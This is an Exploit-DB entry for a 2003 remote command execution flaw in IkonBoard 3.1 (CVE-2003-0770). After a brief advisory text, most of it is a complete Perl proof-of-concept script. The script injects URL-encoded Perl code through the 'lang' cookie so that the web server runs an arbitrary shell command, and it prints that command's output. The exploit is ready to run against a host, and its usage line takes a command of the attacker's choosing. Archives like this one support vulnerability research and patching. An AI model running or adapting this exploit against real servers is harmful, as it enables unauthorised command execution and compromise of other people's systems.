IkonBoard 3.1 Lang Cookie Arbitrary Command Execution Vulnerability 2

2003-05-05T00:00:00
ID EDB-ID:22500
Type exploitdb
Reporter snooq
Modified 2003-05-05T00:00:00

Description

IkonBoard 3.1 Lang Cookie Arbitrary Command Execution Vulnerability (2). CVE-2003-0770. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/7361/info
 
It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data.
 
An attacker may exploit this issue to execute arbitrary commands in the security context of the web server hosting the vulnerable IkonBoard. 

#!/usr/bin/perl
#
#  Date: 5 May 2003
#  Author: snooq [http://www.angelfire.com/linux/snooq/]
#
#  Ikonboard 3.1.1 Remote Command Execution PoC
#  ============================================
#  This bug was found by Nick Cleaton.
#
#  For more info and patch, go to:
#  http://archives.neohapsis.com/archives/bugtraq/2003-04/0027.html
#
#  Use at your very own risk.
#
#  Greetz.. my team mates: JF, Nam, ET..
#  And some new frens: Kader, Bufferoulis, Neil... ;)
#
use Socket;
use FileHandle;

if ($ARGV[0] eq '') {
	print "Usage: $0 <host> [cmd] [path]\n";
	exit;
}

my $port=80;
my $host=$ARGV[0];
my $addr=getaddr($ARGV[0]);
my $cmd=$ARGV[1]?($ARGV[1]):"/bin/uname -a";
my $path=$ARGV[2]?($ARGV[2]):"/cgi-bin/ikonboard.cgi";
my $buff=URLEncode(".\0\" unless(1);"
		   ."print \"Content-type: text/plain\\r\\n\\r\\n\";"
		   ."print \"---BEGIN---\\n\".`$cmd`.\"\\n---END---\";exit;#");

socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n";

SOCKET->autoflush();

print SOCKET "GET $path HTTP/1.1\r\n";
print SOCKET "Host: $host\r\n";
print SOCKET "Cookie: lang=$buff\r\n";
print SOCKET "Connection: close\r\n\r\n";
print "Ikonboard Exploit, by snooq [ jinyean\@hotmail.com ]\n\n";

while (<SOCKET>) {
	if (/^---BEGIN---/) {
		print "> $cmd\n";
		while (<SOCKET>){
			if (/^---END---/) { exit; }
			print; 
		} 
	}
}

print "$host seems not vulnerable.\n";

exit;

sub getaddr {
	my $host=($_[0]);
	my $n=$host;
	$n=~tr/\.//d;

	if ($n=~m/\d+/) {
		return pack('C4',split('\.',$host));
	}
	else {
		return (gethostbyname($host))[4];
	}
}

# URLEncode routine, courtesy of Glenn Fleishman 

sub URLEncode {
	my $theURL=$_[0];
	$theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;
	return $theURL;
}